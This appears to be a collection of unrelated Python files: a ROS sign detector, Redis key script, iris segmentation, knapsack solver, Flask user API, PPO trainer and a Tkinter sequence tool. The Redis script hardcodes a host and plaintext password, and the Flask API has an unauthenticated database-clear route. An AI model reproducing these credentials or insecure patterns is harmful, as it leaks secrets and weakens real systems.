self.lightness_green_h = rospy.get_param("~detect/lane/green/lightness_h", 255)
self.hue_blue_l = rospy.get_param("~detect/lane/blue/hue_l", 78)
self.hue_blue_h = rospy.get_param("~detect/lane/blue/hue_h", 117)
self.saturation_blue_l = rospy.get_param("~detect/lane/blue/saturation_l", 222)
self.saturation_blue_h = rospy.get_param("~detect/lane/blue/saturation_h", 255)
self.lightness_blue_l = rospy.get_param("~detect/lane/blue/lightness_l", 165)
self.lightness_blue_h = rospy.get_param("~detect/lane/blue/lightness_h", 255)
self.sub_image_type = "raw" # "compressed" / "raw"
self.pub_image_type = "raw" # "compressed" / "raw"
self.counter = 1
if self.sub_image_type == "compressed":
# subscribes compressed image
self.sub_image_original = rospy.Subscriber('/detect/image_input/compressed', CompressedImage, self.cbGetImage, queue_size = 1)
elif self.sub_image_type == "raw":
# subscribes raw image
self.sub_image_original = rospy.Subscriber('/detect/image_input', Image, self.cbGetImage, queue_size = 1)
if self.pub_image_type == "compressed":
# publishes compensated image in compressed type
self.pub_image_sign = rospy.Publisher('/detect/image_output/compressed', CompressedImage, queue_size = 1)
elif self.pub_image_type == "raw":
# publishes compensated image in raw type
self.pub_image_sign = rospy.Publisher('/detect/image_output', Image, queue_size = 1)
self.cvBridge = CvBridge()
self.cv_image = None
self.is_image_available = False
rospy.sleep(1)
loop_rate = rospy.Rate(10)
while not rospy.is_shutdown():
if self.is_image_available == True:
self.fnFindSign()
loop_rate.sleep()
def cbGetImage(self, image_msg):
# drop the frame to 1/5 (6fps) because of the processing speed. This is up to your computer's operating power.
if self.counter % 3 != 0:
self.counter += 1
return
else:
self.counter = 1
if self.sub_image_type == "compressed":
np_arr = np.fromstring(image_msg.data, np.uint8)
self.cv_image = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)
else:
self.cv_image = self.cvBridge.imgmsg_to_cv2(image_msg, "bgr8")
self.is_image_available = True
def fnFindSign(self):
cv_image_mask_g = self.fnMaskGreenSign()
cv_image_mask_g = cv2.GaussianBlur(cv_image_mask_g,(5,5),0)
self.detected_green = np.count_nonzero(cv_image_mask_g == 0)
cv_image_mask_b = self.fnMaskBlueSign()
cv_image_mask_b = cv2.GaussianBlur(cv_image_mask_b,(5,5),0)
self.detected_blue = np.count_nonzero(cv_image_mask_b == 0)
cv_image_mask_r = self.fnMaskRedSign()
cv_image_mask_r = cv2.GaussianBlur(cv_image_mask_r,(5,5),0)
self.detected_red = np.count_nonzero(cv_image_mask_r == 0)
if self.detected_green > 3000 and self.detected_blue < 100 and self.detected_red < 100:
rospy.set_param('/tb3/mission_start', True)
print("TURTLEBOT3 MISSION START")
if self.detected_blue > 3000 and self.detected_green < 100 and self.detected_red < 100:
rospy.set_param('/tb2/mission_start', True)
print("TURTLEBOT2 MISSION START")
if self.detected_red > 1000 and self.detected_green < 100 and self.detected_blue < 100:
rospy.set_param('/tb1/move_forward', False)
print("WAIT FOR TB2 ALIGNED")
if self.detected_red > 500 and self.detected_green < 100 and self.detected_blue < 100 and rospy.get_param('/tb2/aligned') == True:
self.detected_red = 0
rospy.set_param('/tb1/move_forward', True)
print("GO TO PARKING LOT")
if self.detected_blue > 1000 and self.detected_green > 1000:
rospy.set_param('/tb1/move_forward', False)
rospy.set_param('/tb1/parking_start', True)
print("PARKING")
def fnMaskRedSign(self):
image = np.copy(self.cv_image)
# Convert BGR to HSV
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
Hue_l = self.hue_red_l
Hue_h = self.hue_red_h
Saturation_l = self.saturation_red_l
Saturation_h = self.saturation_red_h
Lightness_l = self.lightness_red_l
Lightness_h = self.lightness_red_h
# define range of red color in HSV
lower_red = np.array([Hue_l, Saturation_l, Lightness_l])
upper_red = np.array([Hue_h, Saturation_h, Lightness_h])
# Threshold the HSV image to get only red colors
mask = cv2.inRange(hsv, lower_red, upper_red)
# Bitwise-AND mask and original image
res = cv2.bitwise_and(image, image, mask = mask)
mask = cv2.bitwise_not(mask)
return mask
def fnMaskBlueSign(self):
image = np.copy(self.cv_image)
# Convert BGR to HSV
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
Hue_l = self.hue_blue_l
Hue_h = self.hue_blue_h
Saturation_l = self.saturation_blue_l
Saturation_h = self.saturation_blue_h
Lightness_l = self.lightness_blue_l
Lightness_h = self.lightness_blue_h
# define range of blue color in HSV
lower_blue = np.array([Hue_l, Saturation_l, Lightness_l])
upper_blue = np.array([Hue_h, Saturation_h, Lightness_h])
# Threshold the HSV image to get only blue colors
mask = cv2.inRange(hsv, lower_blue, upper_blue)
# Bitwise-AND mask and original image
res = cv2.bitwise_and(image, image, mask = mask)
mask = cv2.bitwise_not(mask)
return mask
def fnMaskGreenSign(self):
image = np.copy(self.cv_image)
# Convert BGR to HSV
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
Hue_l = self.hue_green_l
Hue_h = self.hue_green_h
Saturation_l = self.saturation_green_l
Saturation_h = self.saturation_green_h
Lightness_l = self.lightness_green_l
Lightness_h = self.lightness_green_h
# define range of green color in HSV
lower_green = np.array([Hue_l, Saturation_l, Lightness_l])
upper_green = np.array([Hue_h, Saturation_h, Lightness_h])
# Threshold the HSV image to get only green colors
mask = cv2.inRange(hsv, lower_green, upper_green)
# Bitwise-AND mask and original image
res = cv2.bitwise_and(image, image, mask = mask)
mask = cv2.bitwise_not(mask)
return mask
def main(self):
rospy.spin()
if __name__ == '__main__':
rospy.init_node('sign_detector')
node = DetectSign()
|
15,910 | fdbbd644f18849263b99dd867946f9dcf0974b4f | #!/bin/python
# -*- coding:utf-8 -*-
import os
import os.path
import MySQLdb
import time
import re
import redis
import random
r = redis.Redis(host="10.66.137.165", port = 6379, password="yeejay501")
random.seed(int(time.time()))
nums={}
for i in range(1,20):
num = random.randint(100001,999999)
nums[num] = 1
for num, v in nums.items():
key="22_%d"%(num)
val = r.get(key)
if val is not None:
continue
print num
r.set(key,"1",ex=3600*24*7)
|
15,911 | d7199620d85a15459a44fda78c9402280e65f956 | from seg_master import UNet
import glob
import cv2
import numpy as np
from PIL import Image
src_path = "D:/2. data/total_iris/original_4/"
dst_path = "D:/2. data/total_iris/only_iris_4/"
image_paths = sorted(glob.glob(src_path + "*.png"))
images_rgb_np = []
images_bgr = []
image_names = []
size = 640, 480
for i, image_path in enumerate(image_paths):
image_names.append(image_path.split("\\")[-1])
image_rgb = Image.open(image_path).convert("RGB")
image_rgb = image_rgb.resize(size, resample=Image.BICUBIC)
# convert bgr
r, g, b = image_rgb.split()
image_bgr = Image.merge("RGB", (b, g, r))
images_bgr.append(image_bgr)
image_rgb = np.array(image_rgb)
images_rgb_np.append(image_rgb)
rgb_dataset = np.array(images_rgb_np, dtype="float") / 255.0
m = UNet.UNet(nClasses=1, input_height=480, input_width=640)
pupil_h5model_name = "seg_master/unet_pupil_weight.h5"
m.load_weights(pupil_h5model_name)
pupil_predicts = m.predict(rgb_dataset, batch_size=2)
iris_h5model_name = "seg_master/unet_iris_weight.h5"
m.load_weights(iris_h5model_name)
iris_predicts = m.predict(rgb_dataset, batch_size=2)
for image_rgb, pupil_predict, iris_predict, image_name in zip(images_rgb_np, pupil_predicts, iris_predicts, image_names):
pupil_segmentation = np.where(pupil_predict > 0.5, 100, image_rgb)
iris_segmentation_6 = np.where(iris_predict > 0.6, pupil_segmentation, 100)
iris_segmentation_5 = np.where(iris_predict > 0.6, pupil_segmentation, 100)
# Image._show(Image.fromarray(image_rgb))
# Image._show(Image.fromarray(iris_segmentation))
# filename = image_name[:-4] + +".png"
Image.fromarray(iris_segmentation_5).save(dst_path + "" + image_name)
|
15,912 | e09d449aa497fc1d0d3fc37ca29b36e70d11b1cc | def resolve():
MAX_N = 100
MAX_W = 10000
dp = [[0] * (MAX_W + 1) for _ in range(MAX_N + 1)] # メモ化テーブル
n = int(input())
w = int(input())
wv = []
for i in range(n):
wv.append(list(map(int, input().split(" "))))
# 末端からループを回す
for node in range(n - 1, -1, -1):
# 表の列のすべての要素において"ベストな付加価値の値"を探す
for w_rest in range(w + 1):
if w_rest < wv[node][0]:
dp[node][w_rest] = dp[node + 1][w_rest]
else:
# 足す・足さないで付加価値が大きくなるほうをnodeのベストな値として登録する
dp[node][w_rest] = max(dp[node + 1][w_rest], dp[node + 1][w_rest - wv[node][0]] + wv[node][1])
print(dp[0][w])
# if __name__ == "__main__": # 提出時のみ復活させる
# resolve()
import sys
from io import StringIO
import unittest
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:-1]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_入力例_1(self):
input = """4
5
2 3
1 2
3 4
2 2"""
output = """7"""
self.assertIO(input, output)
if __name__ == "__main__":
unittest.main()
|
15,913 | db6c791fa71f82ca103b0fcc870ed79b8980320d | from django.apps import AppConfig
class CookieappConfig(AppConfig):
name = 'cookieapp'
|
15,914 | 924aea1905aa8ed3841b9e34ba2310377dd07176 | from flask import Flask, request, jsonify, make_response
import requests
import json
app = Flask(__name__)
def is_sha1(maybe_sha):
if len(maybe_sha) != 40:
return False
try:
int(maybe_sha, 16)
except:
return False
return True
# api 1
@app.route('/api/v1/users', methods=['PUT'])
def adduser():
requests.post(
"http://3.212.93.206:80/api/v1/db/write",
data=json.dumps({
"ORIGIN": "USER",
"COMMAND": "ADD_REQUEST_COUNT"
})
)
req = request.get_json()
if req is None:
return make_response('Request body is empty.', 400)
if 'username' not in req or 'password' not in req:
return make_response('Username or password is not present in request body.', 400)
username = req["username"]
password = req["password"]
if username == '' or username is None or password is None or password == '':
return make_response('Username or password is empty.', 400)
if (not is_sha1(password)):
return make_response('Password is not as per given norms.', 400)
if (requests.get(
"http://3.212.93.206:80/api/v1/db/read",
params={
"ORIGIN": "USER",
"COMMAND": "EXISTS",
"FIELD": "username",
"VALUE": username,
"DB": "Users"
}
)).json()["count"] != 0:
return make_response('User already exists.', 400)
requests.post(
"http://3.212.93.206:80/api/v1/db/write",
data=json.dumps({
"ORIGIN": "USER",
"COMMAND": "INSERT",
"FIELDS": ["username", "password"],
"VALUES": [username, password],
"DB": "Users"
})
)
return make_response('Created user.', 201)
# api 2
@app.route('/api/v1/users/<username>', methods=['DELETE'])
def deleteuser(username):
requests.post(
"http://3.212.93.206:80/api/v1/db/write",
data=json.dumps({
"ORIGIN": "USER",
"COMMAND": "ADD_REQUEST_COUNT"
})
)
if username == '' or username is None:
return make_response('Usename is empty.', 400)
if (requests.get(
"http://3.212.93.206:80/api/v1/db/read",
params={
"ORIGIN": "USER",
"COMMAND": "EXISTS",
"FIELD": "username",
"VALUE": username,
"DB": "Users"
}
)).json()["count"] == 0:
return make_response('User does not exist.', 400)
requests.post(
"http://3.212.93.206:80/api/v1/db/write",
data=json.dumps({
"ORIGIN": "USER",
"COMMAND": "DELETE",
"FIELD": "username",
"VALUE": username,
"DB": "Users"
})
)
return make_response('Deleted user.', 200)
# api 10
@app.route('/api/v1/users', methods=['GET'])
def read_all():
requests.post(
"http://3.212.93.206:80/api/v1/db/write",
data=json.dumps({
"ORIGIN": "USER",
"COMMAND": "ADD_REQUEST_COUNT"
})
)
msg = requests.get(
"http://3.212.93.206:80/api/v1/db/read",
params={
"ORIGIN": "USER",
"COMMAND": "READ_ALL",
"DB": "Users"
}
)
if(msg.status_code == 204):
return make_response('', 204)
elif(msg.status_code == 200):
return make_response(jsonify(msg.json()['readall']), 200)
# api 11
@app.route('/api/v1/db/clear', methods=['POST'])
def delete_all():
requests.post(
"http://3.212.93.206:80/api/v1/db/write",
data=json.dumps({
"ORIGIN": "USER",
"COMMAND": "DELETE_ALL"
})
)
return make_response('', 200)
# api 12
@app.route('/api/v1/_count', methods=['GET'])
def count_requests():
msg = requests.get(
"http://3.212.93.206:80/api/v1/db/read",
params={
"ORIGIN": "USER",
"COMMAND": "READ_REQUEST_COUNT"
}
)
if(msg.status_code == 200):
return make_response(jsonify(msg.json()['count']), 200)
# api 13
@app.route('/api/v1/_count', methods=['DELETE'])
def reset_request_count():
requests.post(
"http://3.212.93.206:80/api/v1/db/write",
data=json.dumps({
"ORIGIN": "USER",
"COMMAND": "RESET_REQUEST_COUNT"
})
)
return make_response('', 200)
@app.route('/api/v1/users/health_check', methods=['GET'])
def health_check():
return make_response('', 200)
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False)
|
15,915 | e2cfc0c0b1766ed1864359efde2e6073db4b781b | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import MultivariateNormal
import gym
import numpy as np
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Memory:
def __init__(self):
self.actions = []
#in our case self.inputs ==> input state//goal
self.states = []
self.logprobs = []
self.rewards = []
self.is_terminals = []
def clear_memory(self):
#in ddpg you can learn from data stored from older epochs
del self.actions[:]
del self.states[:]
del self.logprobs[:]
del self.rewards[:]
del self.is_terminals[:]
class ActorCritic(nn.Module):
'''
continous action space PG methods the actor returns tensor of lenght number of action
and those tensors are mean and covariance -- use Gaussian Distribution to Sample from action space
covarinace is used to balance exploration-exploitation problem
'''
def __init__(self, state_dim, action_dim, action_std):
super(ActorCritic, self).__init__()
# action mean range -1 to 1
self.actor = nn.Sequential(
nn.Linear(state_dim, 256),
nn.ReLU(),
nn.Linear(256, 256),
nn.ReLU(),
nn.Linear(256,256),
nn.ReLU(),
nn.Linear(256, action_dim),
nn.Tanh()
)
#the output of network is the mean of actions
# critic
self.critic = nn.Sequential(
nn.Linear(state_dim, 256),
nn.ReLU(),
nn.Linear(256, 256),
nn.ReLU(),
nn.Linear(256, 256),
nn.ReLU(),
nn.Linear(256, 1)
)
#torch.full returns torch_tensor of size action_dim and filled with value action_std*action_std
#action_var --> variance of the action
self.action_var = torch.full((action_dim,), action_std*action_std).to(device)
def forward(self):
raise NotImplementedError
def act(self, state, memory):
#
action_mean = self.actor(state)
#the covariance is 2D diagonal array of action variance
#torch.diagonal --> since action_var is one_dim tensor torch.diag returns 2D array with tensor's values as main diagonal
cov_mat = torch.diag(self.action_var).to(device)
#sample actions from Gaussian Distribution with mean = action_mean, and covariance = action variance, cov_mat
dist = MultivariateNormal(action_mean, cov_mat)
#sample action
action = dist.sample()
action_logprob = dist.log_prob(action)
memory.states.append(state)
memory.actions.append(action)
memory.logprobs.append(action_logprob)
return action.detach()
def evaluate(self, state, action):
action_mean = self.actor(state)
action_var = self.action_var.expand_as(action_mean)
#torch.diag_embed returns 2D diagnoal array with tensor's elements as main diagonal
cov_mat = torch.diag_embed(action_var).to(device)
dist = MultivariateNormal(action_mean, cov_mat)
# its probablitis not values Pi(a|s)
action_logprobs = dist.log_prob(action)
dist_entropy = dist.entropy()
state_value = self.critic(state)
return action_logprobs, torch.squeeze(state_value), dist_entropy
class PPO:
def __init__(self, state_dim, action_dim, action_std, lr, betas, gamma, K_epochs, eps_clip):
self.lr = lr
self.betas = betas
self.gamma = gamma
self.eps_clip = eps_clip
self.K_epochs = K_epochs
self.policy = ActorCritic(state_dim, action_dim, action_std).to(device)
self.optimizer = torch.optim.Adam(self.policy.parameters(), lr=lr, betas=betas)
self.policy_old = ActorCritic(state_dim, action_dim, action_std).to(device)
self.policy_old.load_state_dict(self.policy.state_dict())
self.MseLoss = nn.MSELoss()
def select_action(self, state, memory):
#state.reshape --> change state into vector - single row - of compitable length with the orignal state
state = torch.FloatTensor(state.reshape(1, -1)).to(device)
return self.policy_old.act(state, memory).cpu().data.numpy().flatten()
def update(self, memory):
# Monte Carlo estimate of rewards:
rewards = []
discounted_reward = 0
#loop through all episodes in the epoch
for reward, is_terminal in zip(reversed(memory.rewards), reversed(memory.is_terminals)):
if is_terminal:
discounted_reward = 0
discounted_reward = reward + (self.gamma * discounted_reward)
#insert the new discounted reward - after completing the episode - in index number 0 and push old ones
rewards.insert(0, discounted_reward)
# Normalizing the rewards:
rewards = torch.tensor(rewards).to(device)
rewards = (rewards - rewards.mean()) / (rewards.std() + 1e-5)
# convert list to tensor
old_states = torch.squeeze(torch.stack(memory.states).to(device), 1).detach()
old_actions = torch.squeeze(torch.stack(memory.actions).to(device), 1).detach()
old_logprobs = torch.squeeze(torch.stack(memory.logprobs), 1).to(device).detach()
# Optimize policy for K epochs:
for _ in range(self.K_epochs):
# Evaluating old actions and values :
logprobs, state_values, dist_entropy = self.policy.evaluate(old_states, old_actions)
# Finding the ratio (pi_theta / pi_theta__old):
#exp(log(prob)) = prob
ratios = torch.exp(logprobs - old_logprobs.detach())
# Finding Surrogate Loss:
advantages = rewards - state_values.detach()
surr1 = ratios * advantages
surr2 = torch.clamp(ratios, 1-self.eps_clip, 1+self.eps_clip) * advantages
#total_loss_function = l_clip, loss_critic, loss_entropy
loss = -torch.min(surr1, surr2) + 0.5*self.MseLoss(state_values, rewards) - 0.01*dist_entropy
# take gradient step
self.optimizer.zero_grad()
loss.mean().backward()
self.optimizer.step()
# Copy new weights into old policy:
self.policy_old.load_state_dict(self.policy.state_dict())
epoch_success_rate = []
clip_obs = 100
def _preproc_og( o, g):
#(o - o.mean())/o.std()
o = np.clip(o, -clip_obs, clip_obs)
#(g-g.mean())/g.std()
g = np.clip(g, -clip_obs, clip_obs)
return o, g
def launch():
############## Hyperparameters ##############
env_name = "HandManipulateEggFull-v0"
render = False
solved_reward = 300 # stop training if avg_reward > solved_reward
log_interval = 20 # print avg reward in the interval
max_episodes = 800 # max training episodes
max_timesteps = 1500 # max timesteps in one episode
update_timestep = 400 # update policy every n timesteps
action_std = 0.5 # constant std for action distribution (Multivariate Normal)
K_epochs = 40 # update policy for K epochs
eps_clip = 0.24 # clip parameter for PPO
gamma = 0.99 # discount factor
lr = 0.00101 # parameters for Adam optimizer
betas = (0.9, 0.999)
random_seed = 123
#############################################
# creating environment
env = gym.make(env_name)
state_dim_pre = env.observation_space['observation'].shape[0]
goal_dim = env.observation_space['desired_goal'].shape[0]
state_dim = state_dim_pre + goal_dim
action_dim = env.action_space.shape[0]
env.seed(123)
np.random.seed(123)
torch.manual_seed(123)
'''
if random_seed:
print("Random Seed: {}".format(random_seed))
torch.manual_seed(random_seed)
env.seed(random_seed)
np.random.seed(random_seed)
'''
memory = Memory()
ppo = PPO(state_dim, action_dim, action_std, lr, betas, gamma, K_epochs, eps_clip)
print(lr,betas)
# logging variables
running_reward = 0
avg_length = 0
time_step = 0
# training loop
for epoch in range(350):
running_reward = 0
avg_length = 0
time_step = 0
for i_episode in range(1, max_episodes+1):
episode_success_rate = []
state_ = env.reset()
env.env.reward_type = 'dense'
obs = state_['observation']
g = state_['desired_goal']
#clip the oberservation and goal into range -200, 200
#obs, g = _preproc_og(obs, g)
state = np.concatenate([obs,g])
local_timestep = 0
for t in range(env._max_episode_steps):
local_timestep += 1
time_step +=1
# Running policy_old:
action = ppo.select_action(state, memory)
state_, reward, done, info = env.step(action)
#episode_success_rate.append(info['is_success'])
#env.render()
obs = state_['observation']
g = state_['desired_goal']
#obs, g = _preproc_og(obs, g)
state = np.concatenate([obs,g])
# Saving reward and is_terminals:
memory.rewards.append(reward)
memory.is_terminals.append(done)
# update if its time
#to go below
running_reward += reward
if done :
break
if local_timestep<49:
print('Goaaaaaaaaaaaaaaaal')
#episode_success_rate = np.array(episode_success_rate)
#episode_success_rate = np.mean(episode_success_rate)
avg_length += t
# to go up form here ------>
# stop training if avg_reward > solved_reward
if running_reward > (log_interval*solved_reward):
torch.save(ppo.policy.state_dict(), '/home/muhyahiarl/ppo_grad_project/PPO_continuous_{}.pth'.format(env_name))
print("########## Solved! ##########")
break
# save every 400 episodes
if i_episode % 400 == 0:
torch.save(ppo.policy.state_dict(), '/home/muhyahiarl/ppo_grad_project/PPO_continuous_{}.pth'.format(env_name))
print('updated')
# logging
'''
if i_episode % log_interval == 0:
avg_length = int(avg_length/log_interval)
running_reward = int((running_reward/log_interval))
print('Episode {} \t Avg length: {} \t Avg reward: {}'.format(i_episode, avg_length, running_reward))
running_reward = 0
avg_length = 0
'''
# unitl here <----
#
# bring that bitch below to here |||||
#
#
#
print('reach here_0')
ppo.update(memory)
print('reach here_1')
#memory.clear_memory()
time_step = 0
state_ = env.reset()
env.env.reward_type = 'dense'
print('reach here_2')
obs = state_['observation']
g = state_['desired_goal']
state = np.concatenate([obs,g])
local_timestep = 0
test_success_rate = []
for _ in range(10):
local_success_rate = []
state_ = env.reset()
state = np.concatenate([state_['observation'], state_['desired_goal']])
for t in range(env._max_episode_steps):
local_timestep += 1
time_step +=1
# Running policy_old:
action = ppo.select_action(state, memory)
state_, reward, done, info = env.step(action)
obs = state_['observation']
g = state_['desired_goal']
#obs, g = _preproc_og(obs, g)
state = np.concatenate([obs ,g])
local_success_rate.append(info['is_success'])
if done:
break
local_success_rate = np.array(local_success_rate)
test_success_rate.append(np.mean(local_success_rate))
local_test_success = np.mean(np.array(test_success_rate))
epoch_success_rate.append(local_test_success)
print('epoch ' +str(epoch) +' success rate is ',local_test_success)
memory.clear_memory()
avg_length += t
def _eval_agent():
test_success_rate = []
for _ in range(10):
local_success_rate = []
state_ = env.reset()
state = np.concatenate([state_['observation'], state_['desired_goal']])
for t in range(env._max_episode_steps):
local_timestep += 1
time_step +=1
# Running policy_old:
action = ppo.select_action(state, memory)
state_, reward, done, info = env.step(action)
obs = state_['observation']
g = state_['desired_goal']
#obs, g = _preproc_og(obs, g)
state = np.concatenate([obs ,g])
local_success_rate.append(info['is_success'])
if done:
break
local_success_rate = np.array(local_success_rate)
test_success_rate.append(np.mean(local_success_rate))
return test_success_rate
if __name__ == '__main__':
launch()
np.savetxt('/home/muhyahiarl/ppo_grad_project/ppo_grad_project_handmanipulateeggfull_nepoch_350.txt',epoch_success_rate,delimiter=',')
|
15,916 | f90702994999ed20780f4d587ee70b65478dfbfb | from Bio import SeqIO
from Bio import pairwise2
from Bio.Seq import Seq
from Bio.Alphabet import generic_dna# i need to change it
from Bio.SubsMat import MatrixInfo as matlist
from tkinter import filedialog
import tkinter.messagebox
import tkinter as tk
import pyperclip
from tkinter import ttk
from dict_values import *
root= tk.Tk()
root.title('BioSeq Tool - by Haller-x (GLA7)')
canvas1 = tk.Canvas(root, width = 600, height = 600, relief = 'raised')
canvas1.pack()
#labels
label_bio_seq = tk.Label(root, text='Bio Seq')
label_bio_seq.config(font=('helvetica', 25,'bold'))
canvas1.create_window(300, 50, window=label_bio_seq)
label_sub = tk.Label(root, text='Transcription, Translation and Replication')
label_sub.config(font=('helvetica', 12,'bold'))
canvas1.create_window(300, 100, window=label_sub)
####labels Transcription, Translation and Replication
label_dna_seq = tk.Label(root, text='DNA seq:')
label_dna_seq.config(font=('helvetica', 11))
canvas1.create_window(195, 140, window=label_dna_seq)#
label_complementary_dna = tk.Label(root, text='Complementary DNA:')
label_complementary_dna.config(font=('helvetica', 11))
canvas1.create_window(155, 180, window=label_complementary_dna)
label_rna = tk.Label(root, text='RNA:')
label_rna.config(font=('helvetica', 11))
canvas1.create_window(210, 220, window=label_rna)
label_seq_aa = tk.Label(root, text='Seq AA:')
label_seq_aa.config(font=('helvetica', 11))
canvas1.create_window(200, 260, window=label_seq_aa)
####
label__ = tk.Label(root, text='_______________________________________________________________________________________________________________')###
label__.config(font=('helvetica', 12))
canvas1.create_window(100, 300, window=label__)
#labels pairwise
label_pairwise = tk.Label(root, text=' Pairwise simple alignment-Nucleotides')###
label_pairwise.config(font=('helvetica', 11,'bold'))
canvas1.create_window(140, 340, window=label_pairwise)
label_dna_seq1_pairwise = tk.Label(root, text='First Seq:')###
label_dna_seq1_pairwise.config(font=('helvetica', 11))
canvas1.create_window(80, 370, window=label_dna_seq1_pairwise)
label_dna_seq2_pairwise = tk.Label(root, text='Second Seq:')###
label_dna_seq2_pairwise.config(font=('helvetica', 11))
canvas1.create_window(70, 400, window=label_dna_seq2_pairwise)
label_match_weight_pairwise = tk.Label(root, text='Match weight:')###
label_match_weight_pairwise.config(font=('helvetica', 11))
canvas1.create_window(70, 430, window=label_match_weight_pairwise)
label_mismatch_weight_pairwise = tk.Label(root, text='Mismatch weight:')###
label_mismatch_weight_pairwise.config(font=('helvetica', 11))
canvas1.create_window(70, 460, window=label_mismatch_weight_pairwise)
label_gap_open = tk.Label(root, text='Gap open:')###
label_gap_open.config(font=('helvetica', 11))
canvas1.create_window(70, 490, window=label_gap_open)
label_gap_extend = tk.Label(root, text='Gap extend:')###
label_gap_extend.config(font=('helvetica', 11))
canvas1.create_window(70, 520, window=label_gap_extend)
#labels matrix alignment
label_pairwise_prot = tk.Label(root, text=' Pairwise simple alignment-Protein')###
label_pairwise_prot.config(font=('helvetica', 11,'bold'))
canvas1.create_window(425, 340, window=label_pairwise_prot)
label_dna_seq1_matrix = tk.Label(root, text='First protein:')###
label_dna_seq1_matrix.config(font=('helvetica', 11))
canvas1.create_window(380, 370, window=label_dna_seq1_matrix)
label_dna_seq2_matrix = tk.Label(root, text='Second protein:')###
label_dna_seq2_matrix.config(font=('helvetica', 11))
canvas1.create_window(370, 400, window=label_dna_seq2_matrix)
label_matrix = tk.Label(root, text='Matrix:')###
label_matrix.config(font=('helvetica', 11))
canvas1.create_window(395, 430, window=label_matrix)
var = tk.StringVar(root)
var.set("matlist.benner6")
optionMatrix = tk.OptionMenu(root, var, 'matlist.benner6', 'matlist.benner22', 'matlist.benner74', 'matlist.blosum100', 'matlist.blosum30', 'matlist.blosum35', 'matlist.blosum40', 'matlist.blosum45', 'matlist.blosum50','matlist.blosum55', 'matlist.blosum60', 'matlist.blosum62', 'matlist.blosum65', 'matlist.blosum70','matlist.blosum75', 'matlist.blosum80', 'matlist.blosum85', 'matlist.blosum90', 'matlist.blosum95','matlist.feng', 'matlist.fitch', 'matlist.genetic', 'matlist.gonnet', 'matlist.grant', 'matlist.ident', 'matlist.johnson', 'matlist.levin', 'matlist.mclach','matlist.miyata', 'matlist.nwsgappep', 'matlist.pam120', 'matlist.pam180', 'matlist.pam250', 'matlist.pam30', 'matlist.pam300', 'matlist.pam60', 'matlist.pam90', 'matlist.rao', 'matlist.risler', 'matlist.structure')
canvas1.create_window(485, 430, window=optionMatrix)
chosen_matrix = var.get()
chosen = dict_matrix[chosen_matrix]
#entries DNA PART
entry_dna_seq = tk.Entry (root)#dna seq
canvas1.create_window(300, 140, window=entry_dna_seq)
entry_complementary_dna = tk.Entry (root)#complementary dna
canvas1.create_window(300, 180, window=entry_complementary_dna)
entry_rna = tk.Entry (root)#rna
canvas1.create_window(300, 220, window=entry_rna)
entry_seq_aa = tk.Entry (root)#seq aa
canvas1.create_window(300, 260, window=entry_seq_aa)
#entries alignment part
entry_seq_dna1_pairwise = tk.Entry (root)
canvas1.create_window(195, 370, window=entry_seq_dna1_pairwise)
entry_seq_dna2_pairwise = tk.Entry (root)
canvas1.create_window(195, 400, window=entry_seq_dna2_pairwise)
entry_match_weight_pairwise = tk.Entry (root)
canvas1.create_window(195, 430, window=entry_match_weight_pairwise)
entry_mismatch_weight_pairwise = tk.Entry (root)
canvas1.create_window(195, 460, window=entry_mismatch_weight_pairwise)
entry_gap_open = tk.Entry (root)#seq aa
canvas1.create_window(195, 490, window=entry_gap_open)
entry_gap_extend = tk.Entry (root)#seq aa
canvas1.create_window(195, 520, window=entry_gap_extend)
#entries matrix alignment
entry_prot_seq1_matrix = tk.Entry (root)#seq aa
canvas1.create_window(485, 370, window=entry_prot_seq1_matrix)
entry_prot_seq2_matrix = tk.Entry (root)#seq aa
canvas1.create_window(485, 400, window=entry_prot_seq2_matrix)
def error_dna_codon():
tkinter.messagebox.showerror('Warning', 'Sequence not a multiple of three')
def wrong_input():
tkinter.messagebox.showerror('Error', 'Not a valid sequence')
#maybe add some conference for ATGC
def generateTTR():
try:
dnaC = generate_dnc_c(entry_dna_seq.get())
if int(len(entry_dna_seq.get())) % 3 != 0:
error_dna_codon()
rna = generate_rna(entry_dna_seq.get())
prot = generate_prot(entry_dna_seq.get())
clear()
entry_complementary_dna.insert(0,str(dnaC))
entry_rna.insert(0,rna)
entry_seq_aa.insert(0,prot)
except:
wrong_input()
def clear():
entry_complementary_dna.delete(0, 'end')
entry_rna.delete(0, 'end')
entry_seq_aa.delete(0, 'end')
def generate_dnc_c(dna_seq):
dnaM = Seq(dna_seq, generic_dna)
dnaC = dnaM.complement()
return dnaC
def generate_rna(dna_seq):
dnaM = Seq(dna_seq, generic_dna)
dnaC = dnaM.complement()
rna = dnaM.complement().transcribe()
return rna
def generate_prot(dna_seq):
dnaM = Seq(dna_seq, generic_dna)
dnaC = dnaM.complement()
rna = dnaM.complement().transcribe()
prot = rna.translate(to_stop=False, table=1)
return prot
#Copy functions
def copy_dnam():
pyperclip.copy(entry_complementary_dna.get())
def copy_rna():
pyperclip.copy(entry_rna.get())
def copy_seq_aa():
pyperclip.copy(entry_seq_aa.get())
#save funcions (bioseq)
def save_fasta_dnac():
save_dnac = tk.Tk()
save_dnac.withdraw()
save_dnac.filename = filedialog.asksaveasfilename(title = "Save as ", defaultextension='.txt', filetypes = (("txt files","*.txt"),))
with open(save_dnac.filename, "w") as save_dna_out:
save_dna_out.write(entry_complementary_dna.get())
def save_fasta_rna():
save_rna = tk.Tk()
save_rna.withdraw()
save_rna.filename = filedialog.asksaveasfilename(title = "Save as ", defaultextension='.txt', filetypes = (("txt files","*.txt"),))
with open(save_rna.filename, "w") as save_rna_out:
save_rna_out.write(entry_rna.get())
def save_fasta_seq_aa():
save_seq_aa = tk.Tk()
save_seq_aa.withdraw()
save_seq_aa.filename = filedialog.asksaveasfilename(title = "Save as ", defaultextension='.txt', filetypes = (("txt files","*.txt"),))
with open(save_seq_aa.filename, "w") as save_seq_aa_out:
save_seq_aa_out.write(entry_seq_aa.get())
